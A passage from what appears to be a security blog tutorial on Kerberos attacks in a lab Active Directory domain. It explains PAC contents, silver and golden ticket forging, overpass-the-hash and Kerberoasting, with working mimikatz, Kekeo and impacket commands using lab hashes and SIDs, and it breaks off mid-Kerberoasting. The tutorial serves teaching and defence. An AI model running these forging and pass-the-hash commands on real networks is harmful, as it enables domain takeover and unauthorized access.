data-enlighter-language=\"null\">VALIDATION_INFO \r\nCommonHeader:                   \r\n    Version:                         1 \r\n    Endianness:                      16 \r\n    CommonHeaderLength:              8 \r\n    Filler:                          3435973836 \r\nPrivateHeader:                  \r\n    ObjectBufferLength:              0 \r\n    Filler:                          3435973836 \r\nData:                           \r\n    LogonTime:                      \r\n        dwLowDateTime:                   2905707874 \r\n        dwHighDateTime:                  30808641 \r\n    LogoffTime:                     \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    KickOffTime:                    \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordLastSet:                \r\n        dwLowDateTime:                   3611792846 \r\n        dwHighDateTime:                  30806234 \r\n    PasswordCanChange:              \r\n        dwLowDateTime:                   28399054 \r\n        dwHighDateTime:                  30806436 \r\n    PasswordMustChange:             \r\n        dwLowDateTime:                   3433108942 \r\n        dwHighDateTime:                  30814683 \r\n    EffectiveName:                   u'win10user' \r\n    FullName:                        u'' \r\n    LogonScript:                     u'' \r\n    ProfilePath:                     u'' \r\n    HomeDirectory:                   u'' \r\n    HomeDirectoryDrive:              u'' \r\n    LogonCount:                      79 \r\n    BadPasswordCount:                0 \r\n    UserId:                          1104 \r\n    PrimaryGroupId:                  513 \r\n    GroupCount:                      1 \r\n    GroupIds:                       \r\n        [\r\n             \r\n            RelativeId:                      513 \r\n            Attributes:                      7 ,\r\n        ] \r\n    UserFlags:                       32 \r\n    UserSessionKey:                 \r\n        Data:                            '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    LogonServer:                     u'DC' \r\n    LogonDomainName:                 u'JNKFO' \r\n    LogonDomainId:                  \r\n        Revision:                        1 \r\n        SubAuthorityCount:               4 \r\n        IdentifierAuthority:             '\\x00\\x00\\x00\\x00\\x00\\x05' \r\n        SubAuthority:                   \r\n            [\r\n                 21,\r\n                 3178339118,\r\n                 3033626349,\r\n                 2532976716,\r\n            ] \r\n    LMKey:                           '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    UserAccountControl:              16 \r\n    SubAuthStatus:                   0 \r\n    LastSuccessfulILogon:           \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    LastFailedILogon:               \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    FailedILogonCount:               0 \r\n    Reserved3:                       0 \r\n    SidCount:                        1 \r\n    ExtraSids:                      \r\n        [\r\n             \r\n            Sid:                            \r\n                Revision:                        1 \r\n                SubAuthorityCount:               1 \r\n                IdentifierAuthority:             '\\x00\\x00\\x00\\x00\\x00\\x12' \r\n                SubAuthority:                   \r\n                    [\r\n                         1,\r\n                    ] \r\n            Attributes:                      7 ,\r\n        ] \r\n    ResourceGroupDomainSid:          NULL \r\n    ResourceGroupCount:              0 \r\n    ResourceGroupIds:                NULL<\/pre>\n<p>It&#8217;s up to the service to use this information to validate the user&#8217;s privileges, impersonate, or delegate the logged-on user.<br \/>\nAs you also noticed earlier, the PAC can be found only on the TGT and the TGS, mean that in the 1st case it&#8217;s encrypted with the krbtgt key, and the other it&#8217;s encrypted using the service key.<br \/>\nSo there is no way for the user to manipulate the PAC without getting any of these couple keys, this will come handy later.<br \/>\nPAC is rarely required to validate the TGS data.<br \/>\nif it was used for validation, an extra request is made by the server to the KDC to validate the ticket&#8217;s info.<\/p>\n<p>You can obtain any user&#8217;s PAC using<br \/>\npython getPac.py -targetUser administrator jnkfo.lab\/win10user:&#8221;P@ssw0rd&#8221;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-620\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/26.png\" alt=\"\" width=\"986\" height=\"855\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-620\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/26.png\" alt=\"\" width=\"986\" height=\"855\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/26.png 986w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/26-300x260.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/26-768x666.png 768w\" sizes=\"auto, (max-width: 986px) 100vw, 986px\" \/><\/noscript><\/p>\n<p>or using Kekeo<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">tgt::ask \/user:win10user@jnkfo.lab \/password:P@ssw0rd\r\ntgs::s4u \/tgt:TGT_win10user@jnkfo.lab@JNKFO.LAB_krbtgt~jnkfo.lab@JNKFO.LAB.kirbi \/user:administrator \/pac<\/pre>\n<h1><span class=\"ez-toc-section\" id=\"Kerberos_attacks\"><\/span>Kerberos attacks<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<h2><span class=\"ez-toc-section\" id=\"Silver_ticket\"><\/span>Silver ticket<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>If you noticed the Kerberos authentication flow, you should have noticed that we split it into 2 parts summarized in the following image<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-623\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg\" alt=\"\" width=\"1024\" height=\"698\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-623\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg\" alt=\"\" width=\"1024\" height=\"698\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-623\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg\" alt=\"\" width=\"1024\" height=\"698\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-300x205.jpg 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-768x524.jpg 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy.jpg 1242w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/noscript><\/p>\n<p>Edit: Message D, Authenticator is encrypted using <span style=\"color: #ff0000;\">session<\/span> key obtained from the message A as prementioned, and not using the user&#8217;s <span style=\"color: #ff0000;\">secret<\/span> key sorry for the mistype, and thanks fly to <a href=\"https:\/\/twitter.com\/abdelrhman1919\">@abdelrhman1919<\/a> .<\/p>\n<p><strong>The 1st part<\/strong>, Client &lt;&#8212;&gt; KDC<br \/>\nThis part resulted in the Client has a copy of the TGS which is encrypted using the service&#8217;s key along with the plaintext<\/p>\n<ul>\n<li><span style=\"color: #ff0000;\">Service session key<\/span><\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<li>Service name<\/li>\n<\/ul>\n<p><strong>The 2nd part<\/strong>, Client &lt;&#8211;&gt; Service, This is the more interesting part for the silver ticket.<br \/>\nTo authenticate to the service, the client sends a copy of the TGS which is encrypted using the service key as prementioned (Message E) and contains<\/p>\n<ul>\n<li>Service session key<\/li>\n<li>Username<\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<li>PAC information<\/li>\n<\/ul>\n<p>and the authenticator message (message G) which is encrypted using the Service session key and contains<\/p>\n<ul>\n<li>username<\/li>\n<li>Timestamp<\/li>\n<\/ul>\n<p>So the actual service authentication part starts at <strong>step 5<\/strong>, and all it&#8217;s needed is the service secret key.<br \/>\nif you have a service secret key, you may just create a random session key, add it to your own Service ticket, encrypt it with the service&#8217;s secret, and send it to the service while authenticating.<br \/>\nAs all the service will do is just trying to decrypt that ticket with its own key, which will work because it&#8217;s the same key you used while encrypting the ticket, then use the session key (which you generated) to decrypt the authenticator message as prementioned!<br \/>\nThat&#8217;s how easy it&#8217;s<br \/>\nA demo will make it easier, I have win10 machine key, will use it to create a silver ticket to access it without even making a single connection to the KDC!<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-624\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/27.png\" alt=\"\" width=\"717\" height=\"425\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-624\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/27.png\" alt=\"\" width=\"717\" height=\"425\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/27.png 717w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/27-300x178.png 300w\" sizes=\"auto, (max-width: 717px) 100vw, 717px\" \/><\/noscript><\/p>\n<p>This is the current tickets in that session, and am getting access denied whenever accessing SMB over my machine.<\/p>\n<p>To create ticket I will use mimikatz<\/p>\n<p>kerberos::golden \/user:administrator \/domain:jnkfo.lab \/sid:S-1-5-21-3178339118-3033626349-2532976716 \/target:win10.jnkfo.lab \/rc4:1ad9c160bd7ab9cb4b7c890c96862305 \/service:cifs<\/p>\n<ul>\n<li>user: Username, this can be any user, even invalid one will work.<\/li>\n<li>domain: The domain name<\/li>\n<li>sid: Domain sid, can be obtained via many methods, whoami \/user is one.<\/li>\n<li>target: Target machine<\/li>\n<li>rc4: NTLM hash of the target service<\/li>\n<li>Service: The service name, cifs as am accessing filesharing service<\/li>\n<\/ul>\n<p>Executing this will result in<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-625\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/28.png\" alt=\"\" width=\"721\" height=\"733\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-625\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/28.png\" alt=\"\" width=\"721\" height=\"733\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/28.png 721w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/28-295x300.png 295w\" sizes=\"auto, (max-width: 721px) 100vw, 721px\" \/><\/noscript><\/p>\n<p>and no Kerberos packets are sent to the KDC, as you don&#8217;t need to talk to KDC at all, You got your own TGS and that&#8217;s all.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-626\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29-1024x529.png\" alt=\"\" width=\"1024\" height=\"529\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-626\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29-1024x529.png\" alt=\"\" width=\"1024\" height=\"529\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29-1024x529.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29-300x155.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29-768x397.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29.png 1233w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>So you&#8217;ll find that only the ticket and authenticator were sent directly to the target machine.<\/p>\n<p>If you checked the ticket&#8217;s PAC you&#8217;ll find<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">VALIDATION_INFO \r\nCommonHeader:                   \r\n    Version:                         1 \r\n    Endianness:                      16 \r\n    CommonHeaderLength:              8 \r\n    Filler:                          3435973836 \r\nPrivateHeader:                  \r\n    ObjectBufferLength:              0 \r\n    Filler:                          3435973836 \r\nData:                           \r\n    LogonTime:                      \r\n        dwLowDateTime:                   3283888000 \r\n        dwHighDateTime:                  30809500 \r\n    LogoffTime:                     \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    KickOffTime:                    \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordLastSet:                \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordCanChange:              \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordMustChange:             \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    EffectiveName:                   u'administrator' \r\n    FullName:                        NULL \r\n    LogonScript:                     NULL \r\n    ProfilePath:                     NULL \r\n    HomeDirectory:                   NULL \r\n    HomeDirectoryDrive:              NULL \r\n    LogonCount:                      0 \r\n    BadPasswordCount:                0 \r\n    UserId:                          500 \r\n    PrimaryGroupId:                  513 \r\n    GroupCount:                      5 \r\n    GroupIds:                       \r\n        [\r\n             \r\n            RelativeId:                      513 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      512 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      520 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      518 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      519 \r\n            Attributes:                      7 ,\r\n        ] \r\n    UserFlags:                       0 \r\n    UserSessionKey:                 \r\n        Data:                            '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    LogonServer:                     NULL \r\n    LogonDomainName:                 u'JNKFO' \r\n    LogonDomainId:                  \r\n        Revision:                        1 \r\n        SubAuthorityCount:               4 \r\n        IdentifierAuthority:             '\\x00\\x00\\x00\\x00\\x00\\x05' \r\n        SubAuthority:                   \r\n            [\r\n                 21,\r\n                 3178339118,\r\n                 3033626349,\r\n                 2532976716,\r\n            ] \r\n    LMKey:                           '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    UserAccountControl:              528 \r\n    SubAuthStatus:                   0 \r\n    LastSuccessfulILogon:           \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    LastFailedILogon:               \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    FailedILogonCount:               0 \r\n    Reserved3:                       0 \r\n    SidCount:                        0 \r\n    ExtraSids:                       NULL \r\n    ResourceGroupDomainSid:          NULL \r\n    ResourceGroupCount:              0 \r\n    ResourceGroupIds:                NULL #<\/pre>\n<p>The userid: 500, which is the default local administrator account&#8217;s id, and the domain admins group id 512.<br \/>\nSo basically the ticket will tell the service that you have an admin&#8217;s account over the machine, no matter what username you used.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Golden_ticket\"><\/span>Golden ticket<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Back to the same figure<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-623\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg\" alt=\"\" width=\"1024\" height=\"698\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-623\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg\" alt=\"\" width=\"1024\" height=\"698\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-623\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg\" alt=\"\" width=\"1024\" height=\"698\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-300x205.jpg 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-768x524.jpg 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy.jpg 1242w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/noscript><\/p>\n<p>The golden ticket is all about the TGT, if you remember, the TGT (Message B) is the info needed by the KDC to issue you the service ticket you need.<br \/>\nIf a user with a valid TGT asks to access any service, KDC ill grant him that access.<\/p>\n<p>Golden ticket attack takes part in step 3 (TGS-REQ).<br \/>\nThe TGT is encrypted using the KRBTGT account, KDC will decrypt this and issue the service ticket with the same group memberships and validation info found in the TGT.<br \/>\nSo, if you have the KRBTGT hash, you can forge your own TGT which includes the PAC data with any group membership you want! including domain admins!<br \/>\nsending this to the KDC will result in a service ticket with a domain admin group membership inside!<\/p>\n<p>let&#8217;s give this a try using mimikatz<\/p>\n<p>kerberos::golden \/domain:jnkfo.lab \/sid:S-1-5-21-3178339118-3033626349-2532976716 \/rc4:53de9e86989349da8d705da4e238dede \/user:invalidusername \/ticket:golden.kirbi \/ptt<\/p>\n<p>No new options here just removed the \/service option used in the silver ticket.<\/p>\n<p>I will try to dir the c$ on the domain controller which requires a domain admin to do so.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-627\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/30.png\" alt=\"\" width=\"724\" height=\"892\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-627\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/30.png\" alt=\"\" width=\"724\" height=\"892\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/30.png 724w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/30-243x300.png 243w\" sizes=\"auto, (max-width: 724px) 100vw, 724px\" \/><\/noscript><\/p>\n<p>You will notice that the TGS-REQ and TGS-REP messages were sent and received to and from the KDC before moving to the target machine, and that&#8217;s a difference between the silver and golden ticket<br \/>\nin the golden ticket you&#8217;re not restricted to a single service, you got the KRBTGT, you can create your own TGT, so you can create a TGS for whatever service you want<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-628\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/31.png\" alt=\"\" width=\"1010\" height=\"433\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-628\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/31.png\" alt=\"\" width=\"1010\" height=\"433\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/31.png 1010w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/31-300x129.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/31-768x329.png 768w\" sizes=\"auto, (max-width: 1010px) 100vw, 1010px\" \/><\/noscript><\/p>\n<p>If we viewed the ticket&#8217;s contents we will find the following PAC inside<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">CommonHeader:                   \r\n    Version:                         1 \r\n    Endianness:                      16 \r\n    CommonHeaderLength:              8 \r\n    Filler:                          3435973836 \r\nPrivateHeader:                  \r\n    ObjectBufferLength:              0 \r\n    Filler:                          3435973836 \r\nData:                           \r\n    LogonTime:                      \r\n        dwLowDateTime:                   2159116928 \r\n        dwHighDateTime:                  30809507 \r\n    LogoffTime:                     \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    KickOffTime:                    \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordLastSet:                \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordCanChange:              \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordMustChange:             \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    EffectiveName:                   u'invalidusername' \r\n    FullName:                        NULL \r\n    LogonScript:                     NULL \r\n    ProfilePath:                     NULL \r\n    HomeDirectory:                   NULL \r\n    HomeDirectoryDrive:              NULL \r\n    LogonCount:                      0 \r\n    BadPasswordCount:                0 \r\n    UserId:                          500 \r\n    PrimaryGroupId:                  513 \r\n    GroupCount:                      5 \r\n    GroupIds:                       \r\n        [\r\n             \r\n            RelativeId:                      513 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      512 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      520 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      518 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      519 \r\n            Attributes:                      7 ,\r\n        ] \r\n    UserFlags:                       0 \r\n    UserSessionKey:                 \r\n        Data:                            '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    LogonServer:                     NULL \r\n    LogonDomainName:                 u'JNKFO' \r\n    LogonDomainId:                  \r\n        Revision:                        1 \r\n        SubAuthorityCount:               4 \r\n        IdentifierAuthority:             '\\x00\\x00\\x00\\x00\\x00\\x05' \r\n        SubAuthority:                   \r\n            [\r\n                 21,\r\n                 3178339118,\r\n                 3033626349,\r\n                 2532976716,\r\n            ] \r\n    LMKey:                           '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    UserAccountControl:              528 \r\n    SubAuthStatus:                   0 \r\n    LastSuccessfulILogon:           \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    LastFailedILogon:               \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    FailedILogonCount:               0 \r\n    Reserved3:                       0 \r\n    SidCount:                        0 \r\n    ExtraSids:                       NULL \r\n    ResourceGroupDomainSid:          NULL \r\n    ResourceGroupCount:              0 \r\n    ResourceGroupIds:                NULL #<\/pre>\n<p>Note the userid: 500, which is the default local administrator account, and the domain admins group id 512.<\/p>\n<p>KDC will send this info with the TGS to the client, who will send in turn to the service while accessing.<\/p>\n<p>Now by knowing about the timestamp and the lifetime of the ticket along with the info that KRBTGT account pasword isn&#8217;t usually changed frequently in AD environments, can you figure out why the golden ticket is considered as long term persistence method?<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Overpass_the_hash\"><\/span>Overpass the hash<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>In some cases, if you got the user&#8217;s hash you may not be able to crack it or use it in pass the hash attack for many reasons.<br \/>\nexample: disabled ntlm authentication<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-633\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/34.png\" alt=\"\" width=\"690\" height=\"247\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-633\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/34.png\" alt=\"\" width=\"690\" height=\"247\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/34.png 690w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/34-300x107.png 300w\" sizes=\"auto, (max-width: 690px) 100vw, 690px\" \/><\/noscript><\/p>\n<p>In this case, if you used the pass the hash technique<br \/>\nsekurlsa::pth \/user:win10user \/domain:jnkfo.lab \/ntlm:e19ccf75ee54e06b06a5907af13cef42<br \/>\nand tried accessing the machine directly, You&#8217;ll fail<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-634\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32-1024x145.png\" alt=\"\" width=\"1024\" height=\"145\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-634\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32-1024x145.png\" alt=\"\" width=\"1024\" height=\"145\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32-1024x145.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32-300x42.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32-768x109.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32.png 1464w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>But knowing how Kerberos works, you know that by having the user&#8217;s key you may just go through the whole Kerberos authentication process.<br \/>\nWithout bothering using the NTLM challenge-response auth.<br \/>\nThe attack was implemented in mimikatz already and can be used also via impacket examples<br \/>\nTo use it via mimikatz, all you will need to do is connecting to the target&#8217;s hostname instead of the direct IP, this will force Windows to use Kerberos instead of NTLM auth (Remember?!!!).<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-635\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33-1024x290.png\" alt=\"\" width=\"1024\" height=\"290\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-635\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33-1024x290.png\" alt=\"\" width=\"1024\" height=\"290\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33-1024x290.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33-300x85.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33-768x217.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33.png 1498w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Obviously, overpass the hash take place since the AS-REQ step.<br \/>\nThat&#8217;s how easy it&#8217;s<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Kerbroasting\"><\/span>Kerbroasting<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>I mentioned earlier, that Kerberos authentication itself is all about authentication, not authorization<br \/>\nIf you got a valid domain user, you may just ask the KDC to issue you a valid TGS for any service.<br \/>\nKnowing the fact that SPN attributes can be set to a specific username, and that the TGS is encrypted using service&#8217;s key (user&#8217;s key in that case)<br \/>\nWe can issue a TGS ticket on our own machine, dump the ticket and start an offline bruteforce attack against it to retrieve the plaintext password for that user (service account)!<\/p>\n<p>This has been discussed already at the following <a href=\"https:\/\/blog.redforce.io\/oh-my-kerberos-do-not-get-kerberoasted\/\">blog post <\/a><\/p>\n<p>Let&#8217;s go through the process manually, I will connect to mssql service at win2012.jnkfo.lab and view the list after establishing the connection<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-639\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1-1024x723.png\" alt=\"\" width=\"1024\" height=\"723\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-639\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1-1024x723.png\" alt=\"\" width=\"1024\" height=\"723\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1-1024x723.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1-300x212.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1-768x542.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1.png 